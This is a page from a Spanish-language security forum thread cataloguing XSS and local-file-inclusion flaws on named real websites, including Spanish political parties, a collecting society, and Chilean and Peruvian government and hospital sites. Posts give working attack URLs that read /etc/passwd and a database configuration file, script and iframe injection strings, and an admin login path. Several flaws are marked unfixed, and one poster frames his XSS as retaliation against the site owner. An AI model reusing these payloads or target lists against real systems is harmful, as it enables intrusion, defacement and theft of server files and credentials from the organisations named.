Recopilatorio de Vulnerabilidades de XSS/SQLinjection

Iniciado por sirdarckcat, 26 Mayo 2008, 03:50 AM

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas 1 2 3 4 5 6
Acciones del Usuario

dimitrix

#10
19 Diciembre 2009, 15:47 PM
Sitio web: www.sgae.es
Descubridor: Dimitrix
URL del aviso: http://seguridad.dimitrix.es/index.php/2009/12/18/xss-en-la-sgae-pero-que-penita/
Fecha de descubrimiento: 18/12/09
Fecha de notificación: 18/12/09
Fecha de publicación: 18/12/09
Arreglado: No
Información adicional: Bueno, como ya sabreis la SGAE ha creado una lista con 200 webs que ellos opinan "Ilegales" que quieren cerrar sin órden judicial, y bueno como no tienen muchos cojones no la han publicado, pero como supongo que por cojones mi web (no la pongo por no hacer SPAM) está ahí, pues he decidido darle las gracias cambiando los colorines de  su web:


Código [Seleccionar]
http://www.sgae.es/jsp/email-es.jsp?link=[XSS]



dimitrix

#11
4 Enero 2010, 15:53 PM
Bueno para empezar el año os quería preparar una serie de XSS en distintas webs de partídos políticos, pero por la escasez de tiempo no he podido profundizar en este tema, así que os dejo estos dos:

PSOE

El primer XSS se encuentra en la parte de Suscripciones y aunque en realidad se centra en uno, hay muchos.



http://www.psoe.es/generic/subscription.do?action=Password&type=newsletters&href=[XSS]

Otra cosa que encontré "escarbando" en la web del psoe es el panel administrador de tal:
https://www.psoe.es/generic/login_private.jsp

Y por último en el código fuente del panel administrador podremos ver un comentario de un botón entrar que pone "entrar-rojo"

ESPAÑA 2000

En la web de España 2000 queda un XSS muy muy viejo, que aunque ha cambiado la web, se puede acceder igualmente:



http://www.esp2000.org/v3/foto_grande.php?recordID=2862&cuerpo_img=[XSS]

Como curiosidad en la web de España 2000, si creamos un error en la web con por ejemplo el famoso "> aparecerá de título:  "Welcome to the Frontpage"

http://esp2000.org/index.php?page=shop.brow%22%3Ese&category_id=5&vmcchk=1&option=com_virtuemart&Itemid=1

Saludos y hasta la próxima!

Fuente: http://seguridad.dimitrix.es/index.php/2010/01/02/xss-en-psoe-y-en-espana-2000/



Ari Slash

#12
16 Enero 2010, 18:23 PM Ultima modificación: 21 Enero 2010, 07:53 AM por Ari-Slash
Sitio web: http://www.minagri.gob.cl/
Descubridor: Ari-Slash
URL del aviso: http://h4ckvi505.wordpress.com/2010/01/21/vulnerabilidad-en-minagri-gob-cl/
Fecha de descubrimiento: 16 de enero de 2010
Fecha de notificación: 16 de enero de 2010
Fecha de publicación: 16 de enero de 2010
Arreglado: si 18 de enero de 2010 (ni siquiera un gracias ¬¬ )
Vulnerabilidad: LFI
Código [Seleccionar]
http://www.minagri.gob.cl/tips/descargar.php?file=../include/php/conectaBD.php
http://www.minagri.gob.cl/tips/descargar.php?file=../../../../etc/passwd

Vulnerabilidad: XSS
Código [Seleccionar]
http://www.minagri.gob.cl/buscar.php?txt_busca=d%22%3E%3Ciframe%20src=http://skydrive.cl/foro%3E%3C/iframe%3E%3C




saludos

Ari Slash

#13
18 Enero 2010, 02:51 AM Ultima modificación: 24 Septiembre 2010, 17:51 PM por Ari-Slash
Sitio web: lostambos.com.pe
Descubridor: Ari-Slash y el-pollo
URL del aviso: http://h4ckvi505.wordpress.com/2010/01/21/vulnerabilidad-en-lostambos-com-pe/
Fecha de descubrimiento: 17 de enero de 2010
Fecha de notificación: 17 de enero de 2010
Fecha de publicación: 17 de enero de 2010
Arreglado: Si 18 de Enero de 2010 (eliminaron el arhcivo download.php xD)
Vulnerabilidad: LFI
Código [Seleccionar]
http://www.lostambos.com.pe/download.php?f=../


saludos

Ari Slash

#14
18 Enero 2010, 10:23 AM Ultima modificación: 30 Enero 2010, 08:24 AM por Ari-Slash
Sitio web: www.ceplag.edu.bo
Descubridor: Ari-Slash
URL del aviso: http://h4ckvi505.wordpress.com/2010/01/21/vulnerabilidad-en-ceplag-edu-bo/
Fecha de descubrimiento: 18 de enero de 2010
Fecha de notificación: 18 de enero de 2010
Fecha de publicación: 18 de enero de 2010
Arreglado: No
Vulnerabilidad: LFI
Código [Seleccionar]
www.ceplag.edu.bo/php/descargar.php?file=

jdc

#15
19 Enero 2010, 01:32 AM Ultima modificación: 20 Enero 2010, 05:25 AM por el-pollo
Sitio web: http://www.ongei.gob.pe <-- Oficina nacional de gobierno electronico e informatica
Descubridor: janito24
URL del aviso: http://h4x0red.blogspot.com/2010/01/xss-en-ongeigobpe.html
Fecha de descubrimiento: 18 de enero 2010
Fecha de notificación: 18 de enero 2010
Fecha de publicación: 18 de enero 2010
Arreglado: No
Información adicional: XSS simple en el buscador.

Código [Seleccionar]
http://www.ongei.gob.pe/busquedas/ongei_resultado.asp?txt_parrafo_busq=a%22%3E%3Cscript%3Ealert()%3C/script%3E

Nota:

La pifia debe estar en todas las paginas .gob.pe al parecer las hizo la misma persona. Otro error http://www.ongei.gob.pe/busquedas/ongei_resultado.asp?txt_parrafo_busq=asdfasdfkaskdjf%F1lakjsd%F1lfkj%F1alsdjkf%F1laksjdf%F1lkjal%F1sldkfj%F1alskjdf%F1laksj xD no tiene desactivado los errores asi que debe ser facil encontrar un sqli o similar :S

Ari Slash

#16
19 Enero 2010, 22:09 PM Ultima modificación: 30 Enero 2010, 08:24 AM por Ari-Slash
Sitio web: http://www.hospitalvitarte.gob.pe/ <-- Ministerio de salud
Descubridor: Ari-Slash
URL del aviso: http://h4ckvi505.wordpress.com/2010/01/21/vulnerabilidad-en-hospitalvitarte-gob-pe/
Fecha de descubrimiento: 18 de enero 2010
Fecha de notificación: 18 de enero 2010
Fecha de publicación: 19 de enero 2010
Arreglado: No
Vulnerabilidad: LFI
Código [Seleccionar]
http://www.hospitalvitarte.gob.pe/download.php?url=


saludos

LeGNa29A

#17
20 Enero 2010, 03:17 AM Ultima modificación: 20 Enero 2010, 14:09 PM por LeGNa29A
Sitio web: http://www.ceoe.es/ceoe/search.search.action
                          http://www.isee.es/isee3/search.search.action
                          http://www.ceifor.es/ceifor/search.search.action
Descubridor:  LeGNa29A
URL del aviso: http://legna29a.blogspot.com/2010/01/vulnerabilidades.html
Fecha de descubrimiento: 19/01/10
Fecha de notificación: 19/01/10
Fecha de publicación: 20/01/10
Arreglado:
Información adicional: XSS en los buscadores, los sites están relacionados.
Código [Seleccionar]
<script>alert('XSS')</script>
"Sólo en la medida en que nos exponemos a la aniquilación una y otra vez, encontramos aquello que nos hace verdaderamente indestructibles."
(Pema Chödrön)

jdc

#18
22 Enero 2010, 08:16 AM
Sitio web: http://localhost/ <-- Pagina de inicio Wamp
Descubridor: janito24
URL del aviso: http://h4ckvi505.wordpress.com/2010/01/22/vulnerabilidad-en-localhost/
Fecha de descubrimiento: 22 de enero 2010
Fecha de notificación: 22 de enero 2010
Fecha de publicación: 22 de enero 2010
Arreglado: No
Información adicional: XSS en la variable lang.

Código [Seleccionar]
http://localhost/?lang=%22%3E%3Ch3%3Exss%3C/h3%3E

Nota:  :xD

dimitrix

#19
17 Febrero 2010, 23:47 PM
Sitio web: http://m.tuenti.com
Descubridor: Dimitrix
Fuente: http://seguridad.dimitrix.es/index.php/2010/02/18/xss-parcial-en-tuenti-movil/
Fecha de descubrimiento: 14/2/10
Fecha de notificación: 14/2/10
Fecha de publicación: 17/2/10
Arreglado: No

Información adicional: XSS EN la variable "email" al enviar las invitaciones:




Imprimir
Ir Arriba Páginas 1 2 3 4 5 6
Acciones del Usuario